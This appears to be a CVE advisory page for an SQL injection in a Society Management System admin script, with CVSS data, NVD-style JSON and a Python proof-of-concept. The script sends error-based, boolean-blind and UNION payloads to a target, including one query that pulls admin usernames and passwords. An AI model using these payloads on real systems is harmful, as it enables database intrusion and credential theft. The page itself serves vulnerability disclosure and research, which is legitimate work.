Security Vulnerability Report
中文
CVE-2026-1119 CVSS 7.3 HIGH

CVE-2026-1119

Published: 2026-01-18 12:15:48
Last Modified: 2026-04-29 01:00:02

Description

A flaw has been found in itsourcecode Society Management System 1.0. The affected element is an unknown function of the file /admin/delete_activity.php. Executing a manipulation of the argument activity_id can lead to sql injection. It is possible to launch the attack remotely. The exploit has been published and may be used.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:angeljudesuarez:society_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE
itsourcecode Society Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2026-1119 SQL Injection PoC # Target: itsourcecode Society Management System 1.0 # File: /admin/delete_activity.php # Parameter: activity_id def test_sql_injection(base_url): """ Test for SQL injection vulnerability in delete_activity.php """ target_url = f"{base_url}/admin/delete_activity.php" # Payload 1: Basic injection test - trigger SQL error payload_error = "1'" # Payload 2: Boolean-based blind injection payload_boolean = "1 AND 1=1" payload_boolean_false = "1 AND 1=2" # Payload 3: Union-based injection to extract database version payload_union = "1' UNION SELECT NULL,@@version,NULL,NULL,NULL-- -" # Payload 4: Extract admin credentials payload_creds = "1' UNION SELECT NULL,username,password,NULL,NULL FROM admin LIMIT 0,1-- -" print(f"[*] Testing SQL Injection on: {target_url}") print(f"[*] Target: {base_url}") # Test 1: Basic error-based injection print("\n[1] Testing error-based injection...") params = {"activity_id": payload_error} try: response = requests.get(target_url, params=params, timeout=10) if "error" in response.text.lower() or "sql" in response.text.lower(): print("[+] Potential SQL injection detected!") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") # Test 2: Boolean-based blind injection print("\n[2] Testing boolean-based blind injection...") params_true = {"activity_id": payload_boolean} params_false = {"activity_id": payload_boolean_false} try: resp_true = requests.get(target_url, params=params_true, timeout=10) resp_false = requests.get(target_url, params=params_false, timeout=10) if resp_true.status_code != resp_false.status_code or len(resp_true.text) != len(resp_false.text): print("[+] Boolean-based injection confirmed!") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") # Test 3: Union-based injection print("\n[3] Testing union-based injection...") params_union = {"activity_id": payload_union} try: response = requests.get(target_url, params=params_union, timeout=10) if "5." in response.text or "MariaDB" in response.text or "MySQL" in response.text: print("[+] Union-based injection successful - Database version extracted!") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") print("\n[*] PoC completed. Manual verification recommended.") if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} http://target.com") sys.exit(1) base_url = sys.argv[1].rstrip('/') test_sql_injection(base_url)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-1119", "sourceIdentifier": "[email protected]", "published": "2026-01-18T12:15:48.270", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in itsourcecode Society Management System 1.0. The affected element is an unknown function of the file /admin/delete_activity.php. Executing a manipulation of the argument activity_id can lead to sql injection. It is possible to launch the attack remotely. The exploit has been published and may be used."}, {"lang": "es", "value": "Se ha encontrado una vulnerabilidad en itsourcecode Society Management System 1.0. El elemento afectado es una función desconocida del archivo /admin/delete_activity.PHP. La ejecución de una manipulación del argumento activity_id puede conducir a una inyección SQL. Es posible lanzar el ataque de forma remota. El exploit ha sido publicado y puede ser utilizado."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:angeljudesuarez:society_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "99B926B0-DB28-4E1F-8F49-489C73C35F36"}]}]}], "references": [{"url": "https://github.com/AriazzzZ/CVE/issues/1", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Mitigation", "Third Party Advisory"]}, {"url": "https://itsourcecode.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://vuldb.com/?ctiid.341711", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.341711", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.734290", "source": "[email protected]", "tags": ["Third Party Advisor ... (truncated)